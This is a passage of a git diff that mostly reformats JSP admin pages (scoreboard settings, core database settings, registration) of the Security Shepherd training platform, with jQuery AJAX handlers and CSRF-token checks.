+			try {
+				showClasses = classList.next();
+			} catch (SQLException e) {
+				ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+						"Could not open classList: " + e.toString(), ses.getAttribute("userName"));
+				showClasses = false;
+			}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Configure Scoreboard</h1>
-    <div class="entry">
-        <br/>
-        <div id="configureScoreboardDiv">
-            <a href="javascript:;" style="text-decoration: none;"
-               id="publicScoreboard"
-               title="Make the scoreboard public to everybody">
-                <div
-                        class="menuButton">Make Scoreboard Public
-                </div>
-            </a> <a
-                href="javascript:;" style="text-decoration: none;"
-                id="enableScoreboard"
-                title="Enable scoreboard that lists all users regardless of class">
-            <div
-                    class="menuButton">Enable Scoreboard
-            </div>
-        </a> <a href="javascript:;"
-                style="text-decoration: none;" id="enableAdminScoreboard"
-                title="Disable the scoreboard">
-            <div class="menuButton">Enable
-                Scoreboard for Admins
-            </div>
-        </a> <a href="javascript:;"
-                style="text-decoration: none;" id="disableScoreboard"
-                title="Disable the scoreboard">
-            <div class="menuButton">Disable
-                Scoreboard
-            </div>
-        </a> <br/>
-            <h2 class="title">Enable Class Specific Scoreboards</h2>
-            <p>When users visit the scoreboard, they will only see a list of
-                users from their class. Admins that visit the scoreboard will still
-                see the scoreboard the default class.</p>
-            <a href="javascript:;" style="text-decoration: none;"
-               id="classSpecific" title="Enable Class Specific Scoreboard">
-                <div
-                        class="menuButton">Enable Class Specific Scoreboard
-                </div>
-            </a> <a
-                href="javascript:;" style="text-decoration: none;"
-                id="adminClassSpecific"
-                title="Enable Class Specific Scoreboard For Admins">
-            <div
-                    class="menuButton">Enable Class Specific Scoreboard for
-                Admins
-            </div>
-        </a>
-        </div>
-        <br>
-        <div id="loadingSign" style="display: none;" class="menuButton">Loading...</div>
-        <div id="badData" style="display: none;"></div>
-        <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    </div>
+	<h1 class="title">Configure Scoreboard</h1>
+	<div class="entry">
+		<br />
+		<div id="configureScoreboardDiv">
+			<a href="javascript:;" style="text-decoration: none;"
+				id="publicScoreboard"
+				title="Make the scoreboard public to everybody"><div
+					class="menuButton">Make Scoreboard Public</div></a> <a
+				href="javascript:;" style="text-decoration: none;"
+				id="enableScoreboard"
+				title="Enable scoreboard that lists all users regardless of class"><div
+					class="menuButton">Enable Scoreboard</div></a> <a href="javascript:;"
+				style="text-decoration: none;" id="enableAdminScoreboard"
+				title="Disable the scoreboard"><div class="menuButton">Enable
+					Scoreboard for Admins</div></a> <a href="javascript:;"
+				style="text-decoration: none;" id="disableScoreboard"
+				title="Disable the scoreboard"><div class="menuButton">Disable
+					Scoreboard</div></a> <br />
+			<h2 class="title">Enable Class Specific Scoreboards</h2>
+			<p>When users visit the scoreboard, they will only see a list of
+				users from their class. Admins that visit the scoreboard will still
+				see the scoreboard the default class.</p>
+			<a href="javascript:;" style="text-decoration: none;"
+				id="classSpecific" title="Enable Class Specific Scoreboard"><div
+					class="menuButton">Enable Class Specific Scoreboard</div></a> <a
+				href="javascript:;" style="text-decoration: none;"
+				id="adminClassSpecific"
+				title="Enable Class Specific Scoreboard For Admins"><div
+					class="menuButton">Enable Class Specific Scoreboard for
+					Admins</div></a>
+		</div>
+		<br>
+		<div id="loadingSign" style="display: none;" class="menuButton">Loading...</div>
+		<div id="badData" style="display: none;"></div>
+		<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	</div>
 </div>
 <script>
-    var theCsrfToken = "<%=csrfToken%>";
-    var theClass;
-    var theUsers = new Array();
-    var topOfStack = 0;
+			var theCsrfToken = "<%=csrfToken%>";
+			var theClass;
+			var theUsers = new Array();
+			var topOfStack = 0;
+			
+			$("#classSpecific").click(function(){
+				$("#loadingSign").show("fast");
+				$("#badData").hide("fast");
+				$("#resultDiv").hide("fast");
+				//The Ajax Operation
+				//$("#badData").hide("fast");
+				$("#configureScoreboardDiv").slideUp("fast", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "EnableScoreboard",
+						data: {
+							classId: "classSpecific",
+							csrfToken: theCsrfToken
+						},
+						async: false
+					});
+					$("#loadingSign").hide("fast", function(){
+						if(ajaxCall.status == 200)
+						{
+							$("#resultDiv").html(ajaxCall.responseText);
+							$("#resultDiv").show("fast");
+						}
+						else
+						{
+							$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+							$("#badData").show("slow");
+						}
+						$("#configureScoreboardDiv").slideDown("slow");
+						$('html, body').animate({
+					        scrollTop: $("#resultDiv").offset().top
+					    }, 1000);
+					});
+				});
+			});
+			
+			$("#adminClassSpecific").click(function(){
+				$("#loadingSign").show("fast");
+				$("#badData").hide("fast");
+				$("#resultDiv").hide("fast");
+				theClass = $("#classId").val();
+				//The Ajax Operation
+				//$("#badData").hide("fast");
+				$("#configureScoreboardDiv").slideUp("fast", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "EnableScoreboard",
+						data: {
+							classId: "<%=Register.getDefaultClass()%>",
+															restricted : "true",
+															csrfToken : theCsrfToken
+														},
+														async : false
+													});
+											$("#loadingSign")
+													.hide(
+															"fast",
+															function() {
+																if (ajaxCall.status == 200) {
+																	$(
+																			"#resultDiv")
+																			.html(
+																					ajaxCall.responseText);
+																	$(
+																			"#resultDiv")
+																			.show(
+																					"fast");
+																} else {
+																	$(
+																			"#badData")
+																			.html(
+																					"<div id='errorAlert'><p> Sorry but there was an error: "
+																							+ ajaxCall.status
+																							+ " "
+																							+ ajaxCall.statusText
+																							+ "</p></div>");
+																	$(
+																			"#badData")
+																			.show(
+																					"slow");
+																}
+																$(
+																		"#configureScoreboardDiv")
+																		.slideDown(
+																				"slow");
+																$('html, body')
+																		.animate(
+																				{
+																					scrollTop : $(
+																							"#resultDiv")
+																							.offset().top
+																				},
+																				1000);
+															});
+										});
+					});
 
-    $("#classSpecific").click(function () {
-        $("#loadingSign").show("fast");
-        $("#badData").hide("fast");
-        $("#resultDiv").hide("fast");
-        //The Ajax Operation
-        //$("#badData").hide("fast");
-        $("#configureScoreboardDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "EnableScoreboard",
-                data: {
-                    classId: "classSpecific",
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingSign").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultDiv").html(ajaxCall.responseText);
-                    $("#resultDiv").show("fast");
-                } else {
-                    $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                    $("#badData").show("slow");
-                }
-                $("#configureScoreboardDiv").slideDown("slow");
-                $('html, body').animate({
-                    scrollTop: $("#resultDiv").offset().top
-                }, 1000);
-            });
-        });
-    });
+			$("#publicScoreboard")
+			.click(
+					function() {
+						$("#loadingSign").show("fast");
+						$("#badData").hide("fast");
+						$("#resultDiv").hide("fast");
+						//The Ajax Operation
+						//$("#badData").hide("fast");
+						$("#configureScoreboardDiv")
+								.slideUp(
+										"fast",
+										function() {
+											var ajaxCall = $.ajax({
+												type : "POST",
+												url : "EnableScoreboard",
+												data : {
+													classId : "",
+													restricted : "false",
+													csrfToken : theCsrfToken
+												},
+												async : false
+											});
+											$("#loadingSign")
+													.hide(
+															"fast",
+															function() {
+																if (ajaxCall.status == 200) {
+																	$(
+																			"#resultDiv")
+																			.html(
+																					ajaxCall.responseText);
+																	$(
+																			"#resultDiv")
+																			.show(
+																					"fast");
+																} else {
+																	$(
+																			"#badData")
+																			.html(
+																					"<div id='errorAlert'><p> Sorry but there was an error: "
+																							+ ajaxCall.status
+																							+ " "
+																							+ ajaxCall.statusText
+																							+ "</p></div>");
+																	$(
+																			"#badData")
+																			.show(
+																					"slow");
+																}
+																$(
+																		"#configureScoreboardDiv")
+																		.slideDown(
+																				"slow");
+																$('html, body')
+																		.animate(
+																				{
+																					scrollTop : $(
+																							"#resultDiv")
+																							.offset().top
+																				},
+																				1000);
+															});
+										});
+					});
+			
+	$("#enableScoreboard")
+			.click(
+					function() {
+						$("#loadingSign").show("fast");
+						$("#badData").hide("fast");
+						$("#resultDiv").hide("fast");
+						//The Ajax Operation
+						//$("#badData").hide("fast");
+						$("#configureScoreboardDiv")
+								.slideUp(
+										"fast",
+										function() {
+											var ajaxCall = $.ajax({
+												type : "POST",
+												url : "EnableScoreboard",
+												data : {
+													classId : "",
+													csrfToken : theCsrfToken
+												},
+												async : false
+											});
+											$("#loadingSign")
+													.hide(
+															"fast",
+															function() {
+																if (ajaxCall.status == 200) {
+																	$(
+																			"#resultDiv")
+																			.html(
+																					ajaxCall.responseText);
+																	$(
+																			"#resultDiv")
+																			.show(
+																					"fast");
+																} else {
+																	$(
+																			"#badData")
+																			.html(
+																					"<div id='errorAlert'><p> Sorry but there was an error: "
+																							+ ajaxCall.status
+																							+ " "
+																							+ ajaxCall.statusText
+																							+ "</p></div>");
+																	$(
+																			"#badData")
+																			.show(
+																					"slow");
+																}
+																$(
+																		"#configureScoreboardDiv")
+																		.slideDown(
+																				"slow");
+																$('html, body')
+																		.animate(
+																				{
+																					scrollTop : $(
+																							"#resultDiv")
+																							.offset().top
+																				},
+																				1000);
+															});
+										});
+					});
 
-    $("#adminClassSpecific").click(function () {
-        $("#loadingSign").show("fast");
-        $("#badData").hide("fast");
-        $("#resultDiv").hide("fast");
-        theClass = $("#classId").val();
-        //The Ajax Operation
-        //$("#badData").hide("fast");
-        $("#configureScoreboardDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "EnableScoreboard",
-                data: {
-                    classId: "<%=Register.getDefaultClass()%>",
-                    restricted: "true",
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingSign")
-                .hide(
-                    "fast",
-                    function () {
-                        if (ajaxCall.status == 200) {
-                            $(
-                                "#resultDiv")
-                                .html(
-                                    ajaxCall.responseText);
-                            $(
-                                "#resultDiv")
-                                .show(
-                                    "fast");
-                        } else {
-                            $(
-                                "#badData")
-                                .html(
-                                    "<div id='errorAlert'><p> Sorry but there was an error: "
-                                    + ajaxCall.status
-                                    + " "
-                                    + ajaxCall.statusText
-                                    + "</p></div>");
-                            $(
-                                "#badData")
-                                .show(
-                                    "slow");
-                        }
-                        $(
-                            "#configureScoreboardDiv")
-                            .slideDown(
-                                "slow");
-                        $('html, body')
-                            .animate(
-                                {
-                                    scrollTop: $(
-                                        "#resultDiv")
-                                        .offset().top
-                                },
-                                1000);
-                    });
-        });
-    });
+	$("#enableAdminScoreboard")
+			.click(
+					function() {
+						$("#loadingSign").show("fast");
+						$("#badData").hide("fast");
+						$("#resultDiv").hide("fast");
+						//The Ajax Operation
+						//$("#badData").hide("fast");
+						$("#configureScoreboardDiv")
+								.slideUp(
+										"fast",
+										function() {
+											var ajaxCall = $.ajax({
+												type : "POST",
+												url : "EnableScoreboard",
+												data : {
+													classId : "",
+													restricted : "true",
+													csrfToken : theCsrfToken
+												},
+												async : false
+											});
+											var htmlHeap = "";
+											$("#loadingSign")
+													.hide(
+															"fast",
+															function() {
+																if (ajaxCall.status == 200) {
+																	$(
+																			"#resultDiv")
+																			.html(
+																					ajaxCall.responseText);
+																	$(
+																			"#resultDiv")
+																			.show(
+																					"fast");
+																} else {
+																	$(
+																			"#badData")
+																			.html(
+																					"<div id='errorAlert'><p> Sorry but there was an error: "
+																							+ ajaxCall.status
+																							+ " "
+																							+ ajaxCall.statusText
+																							+ "</p></div>");
+																	$(
+																			"#badData")
+																			.show(
+																					"slow");
+																}
+																$(
+																		"#configureScoreboardDiv")
+																		.slideDown(
+																				"slow");
+																$('html, body')
+																		.animate(
+																				{
+																					scrollTop : $(
+																							"#resultDiv")
+																							.offset().top
+																				},
+																				1000);
+															});
+										});
+					});
 
-    $("#publicScoreboard")
-        .click(
-            function () {
-                $("#loadingSign").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                //The Ajax Operation
-                //$("#badData").hide("fast");
-                $("#configureScoreboardDiv")
-                    .slideUp(
-                        "fast",
-                        function () {
-                            var ajaxCall = $.ajax({
-                                type: "POST",
-                                url: "EnableScoreboard",
-                                data: {
-                                    classId: "",
-                                    restricted: "false",
-                                    csrfToken: theCsrfToken
-                                },
-                                async: false
-                            });
-                            $("#loadingSign")
-                                .hide(
-                                    "fast",
-                                    function () {
-                                        if (ajaxCall.status == 200) {
-                                            $(
-                                                "#resultDiv")
-                                                .html(
-                                                    ajaxCall.responseText);
-                                            $(
-                                                "#resultDiv")
-                                                .show(
-                                                    "fast");
-                                        } else {
-                                            $(
-                                                "#badData")
-                                                .html(
-                                                    "<div id='errorAlert'><p> Sorry but there was an error: "
-                                                    + ajaxCall.status
-                                                    + " "
-                                                    + ajaxCall.statusText
-                                                    + "</p></div>");
-                                            $(
-                                                "#badData")
-                                                .show(
-                                                    "slow");
-                                        }
-                                        $(
-                                            "#configureScoreboardDiv")
-                                            .slideDown(
-                                                "slow");
-                                        $('html, body')
-                                            .animate(
-                                                {
-                                                    scrollTop: $(
-                                                        "#resultDiv")
-                                                        .offset().top
-                                                },
-                                                1000);
-                                    });
-                        });
-            });
-
-    $("#enableScoreboard")
-        .click(
-            function () {
-                $("#loadingSign").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                //The Ajax Operation
-                //$("#badData").hide("fast");
-                $("#configureScoreboardDiv")
-                    .slideUp(
-                        "fast",
-                        function () {
-                            var ajaxCall = $.ajax({
-                                type: "POST",
-                                url: "EnableScoreboard",
-                                data: {
-                                    classId: "",
-                                    csrfToken: theCsrfToken
-                                },
-                                async: false
-                            });
-                            $("#loadingSign")
-                                .hide(
-                                    "fast",
-                                    function () {
-                                        if (ajaxCall.status == 200) {
-                                            $(
-                                                "#resultDiv")
-                                                .html(
-                                                    ajaxCall.responseText);
-                                            $(
-                                                "#resultDiv")
-                                                .show(
-                                                    "fast");
-                                        } else {
-                                            $(
-                                                "#badData")
-                                                .html(
-                                                    "<div id='errorAlert'><p> Sorry but there was an error: "
-                                                    + ajaxCall.status
-                                                    + " "
-                                                    + ajaxCall.statusText
-                                                    + "</p></div>");
-                                            $(
-                                                "#badData")
-                                                .show(
-                                                    "slow");
-                                        }
-                                        $(
-                                            "#configureScoreboardDiv")
-                                            .slideDown(
-                                                "slow");
-                                        $('html, body')
-                                            .animate(
-                                                {
-                                                    scrollTop: $(
-                                                        "#resultDiv")
-                                                        .offset().top
-                                                },
-                                                1000);
-                                    });
-                        });
-            });
-
-    $("#enableAdminScoreboard")
-        .click(
-            function () {
-                $("#loadingSign").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                //The Ajax Operation
-                //$("#badData").hide("fast");
-                $("#configureScoreboardDiv")
-                    .slideUp(
-                        "fast",
-                        function () {
-                            var ajaxCall = $.ajax({
-                                type: "POST",
-                                url: "EnableScoreboard",
-                                data: {
-                                    classId: "",
-                                    restricted: "true",
-                                    csrfToken: theCsrfToken
-                                },
-                                async: false
-                            });
-                            var htmlHeap = "";
-                            $("#loadingSign")
-                                .hide(
-                                    "fast",
-                                    function () {
-                                        if (ajaxCall.status == 200) {
-                                            $(
-                                                "#resultDiv")
-                                                .html(
-                                                    ajaxCall.responseText);
-                                            $(
-                                                "#resultDiv")
-                                                .show(
-                                                    "fast");
-                                        } else {
-                                            $(
-                                                "#badData")
-                                                .html(
-                                                    "<div id='errorAlert'><p> Sorry but there was an error: "
-                                                    + ajaxCall.status
-                                                    + " "
-                                                    + ajaxCall.statusText
-                                                    + "</p></div>");
-                                            $(
-                                                "#badData")
-                                                .show(
-                                                    "slow");
-                                        }
-                                        $(
-                                            "#configureScoreboardDiv")
-                                            .slideDown(
-                                                "slow");
-                                        $('html, body')
-                                            .animate(
-                                                {
-                                                    scrollTop: $(
-                                                        "#resultDiv")
-                                                        .offset().top
-                                                },
-                                                1000);
-                                    });
-                        });
-            });
-
-    $("#disableScoreboard")
-        .click(
-            function () {
-                $("#loadingSign").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                //The Ajax Operation
-                $("#configureScoreboardDiv")
-                    .slideUp(
-                        "fast",
-                        function () {
-                            var ajaxCall = $.ajax({
-                                type: "POST",
-                                url: "DisableScoreboard",
-                                data: {
-                                    classId: "",
-                                    csrfToken: theCsrfToken
-                                },
-                                async: false
-                            });
-                            $("#loadingSign")
-                                .hide(
-                                    "fast",
-                                    function () {
-                                        if (ajaxCall.status == 200) {
-                                            $(
-                                                "#resultDiv")
-                                                .html(
-                                                    ajaxCall.responseText);
-                                            $(
-                                                "#resultDiv")
-                                                .show(
-                                                    "fast");
-                                        } else {
-                                            $(
-                                                "#badData")
-                                                .html(
-                                                    "<div id='errorAlert'><p> Sorry but there was an error: "
-                                                    + ajaxCall.status
-                                                    + " "
-                                                    + ajaxCall.statusText
-                                                    + "</p></div>");
-                                            $(
-                                                "#badData")
-                                                .show(
-                                                    "slow");
-                                        }
-                                        $(
-                                            "#configureScoreboardDiv")
-                                            .slideDown(
-                                                "slow");
-                                        $('html, body')
-                                            .animate(
-                                                {
-                                                    scrollTop: $(
-                                                        "#resultDiv")
-                                                        .offset().top
-                                                },
-                                                1000);
-                                    });
-                        });
-            });
+	$("#disableScoreboard")
+			.click(
+					function() {
+						$("#loadingSign").show("fast");
+						$("#badData").hide("fast");
+						$("#resultDiv").hide("fast");
+						//The Ajax Operation
+						$("#configureScoreboardDiv")
+								.slideUp(
+										"fast",
+										function() {
+											var ajaxCall = $.ajax({
+												type : "POST",
+												url : "DisableScoreboard",
+												data : {
+													classId : "",
+													csrfToken : theCsrfToken
+												},
+												async : false
+											});
+											$("#loadingSign")
+													.hide(
+															"fast",
+															function() {
+																if (ajaxCall.status == 200) {
+																	$(
+																			"#resultDiv")
+																			.html(
+																					ajaxCall.responseText);
+																	$(
+																			"#resultDiv")
+																			.show(
+																					"fast");
+																} else {
+																	$(
+																			"#badData")
+																			.html(
+																					"<div id='errorAlert'><p> Sorry but there was an error: "
+																							+ ajaxCall.status
+																							+ " "
+																							+ ajaxCall.statusText
+																							+ "</p></div>");
+																	$(
+																			"#badData")
+																			.show(
+																					"slow");
+																}
+																$(
+																		"#configureScoreboardDiv")
+																		.slideDown(
+																				"slow");
+																$('html, body')
+																		.animate(
+																				{
+																					scrollTop : $(
+																							"#resultDiv")
+																							.offset().top
+																				},
+																				1000);
+															});
+										});
+					});
 </script>
 <%
-    if (Analytics.googleAnalyticsOn) {
+	if (Analytics.googleAnalyticsOn) {
 %><%=Analytics.googleAnalyticsScript%>
 <%
-    }
+	}
 %>
 <%
-        } //Valid Session If
-        else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } //Session If
-    else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+	} //Valid Session If
+		else {
+			response.sendRedirect("../../loggedOutSheep.html");
+		}
+	} //Session If
+	else {
+		response.sendRedirect("../../loggedOutSheep.html");
+	}
 %>
diff --git a/src/main/webapp/admin/config/setCoreDatabase.jsp b/src/main/webapp/admin/config/setCoreDatabase.jsp
index 85b1e73ad..28922df3e 100644
--- a/src/main/webapp/admin/config/setCoreDatabase.jsp
+++ b/src/main/webapp/admin/config/setCoreDatabase.jsp
@@ -1,129 +1,141 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setCoreDatabase.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setCoreDatabase.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setCoreHostAddress.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setCoreHostAddress.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtml(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <h1 class="title">Core Database Server Info</h1>
 <p>If you are using a non-standard database configuration for
-    Security Shepherd, you will need to specify the following information
-    for your core database.</p>
+	Security Shepherd, you will need to specify the following information
+	for your core database.</p>
 
-<br/>
-<br/>
+<br />
+<br />
 <div id="badData" style="display: none;"></div>
 <div id="theStep">
-    <form action="javascript:;" id="leForm">
-        <table align="center">
-            <tr>
-                <td><p>Database URL:</p></td>
-                <td><input type="text" id="databaseURL" value=""/></td>
-            </tr>
-            <tr>
-                <td><p>Username:</p></td>
-                <td><input type="text" id="databaseUsername"/></td>
-            </tr>
-            <tr>
-                <td><p>Password:</p></td>
-                <td><input type="password" id="databasePassword"/></td>
-            </tr>
-            <tr>
-                <td colspan="2" align="center"><input type="submit"
-                                                      id="submitButton" value="Set Core Database Data"/></td>
-            </tr>
-        </table>
-    </form>
-    <div id="loadingSign" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultsDiv" class="informationBox" style="display: none;"></div>
+	<form action="javascript:;" id="leForm">
+		<table align="center">
+			<tr>
+				<td><p>Database URL:</p></td>
+				<td><input type="text" id="databaseURL" value="" /></td>
+			</tr>
+			<tr>
+				<td><p>Username:</p></td>
+				<td><input type="text" id="databaseUsername" /></td>
+			</tr>
+			<tr>
+				<td><p>Password:</p></td>
+				<td><input type="password" id="databasePassword" /></td>
+			</tr>
+			<tr>
+				<td colspan="2" align="center"><input type="submit"
+					id="submitButton" value="Set Core Database Data" /></td>
+			</tr>
+		</table>
+	</form>
+	<div id="loadingSign" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultsDiv" class="informationBox" style="display: none;"></div>
 </div>
 <script>
-    $("#leForm").submit(function () {
-        $("#badData").hide("fast");
-        $("#resultsDiv").hide("fast");
-        $("#loadingSign").show("fast");
-        var url = $("#databaseURL").val();
-        var username = $("#databaseUsername").val();
-        var password = $("#databasePassword").val();
-        $("#submitButton").hide("fast");
-        $("#theStep").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "changeCoreDatabase",
-                data: {
-                    databaseUrl: url,
-                    databaseUsername: username,
-                    databasePassword: password,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            $("#loadingSign").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultsDiv").html(ajaxCall.responseText);
-                    $("#resultsDiv").show("fast");
-                } else {
-                    $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                    $("#badData").show("slow");
-                }
-                $("#theStep").slideDown("slow");
-                $('html, body').animate({
-                    scrollTop: $("#resultsDiv").offset().top
-                }, 1000);
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#leForm").submit(function(){
+		$("#badData").hide("fast");
+		$("#resultsDiv").hide("fast");
+		$("#loadingSign").show("fast");
+		var url = $("#databaseURL").val();
+		var username = $("#databaseUsername").val();
+		var password = $("#databasePassword").val();
+		$("#submitButton").hide("fast");
+		$("#theStep").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				dataType: "text",
+				type: "POST",
+				url: "changeCoreDatabase",
+				data: {
+					databaseUrl: url,
+					databaseUsername: username,
+					databasePassword: password,
+					csrfToken: "<%= csrfToken %>"
+				},
+				async: false
+			});
+			$("#loadingSign").hide("fast", function(){
+				if(ajaxCall.status == 200)
+				{
+					$("#resultsDiv").html(ajaxCall.responseText);
+					$("#resultsDiv").show("fast");
+				}
+				else
+				{
+					$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+					$("#badData").show("slow");
+				}
+				$("#theStep").slideDown("slow");
+				$('html, body').animate({
+			        scrollTop: $("#resultsDiv").offset().top
+			    }, 1000);
+			});
+		});
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/config/updateRegistration.jsp b/src/main/webapp/admin/config/updateRegistration.jsp
index d0c815a30..158f0d944 100644
--- a/src/main/webapp/admin/config/updateRegistration.jsp
+++ b/src/main/webapp/admin/config/updateRegistration.jsp
@@ -1,154 +1,167 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: updateRegistration.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: updateRegistration.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(updateRegistration.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(updateRegistration.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
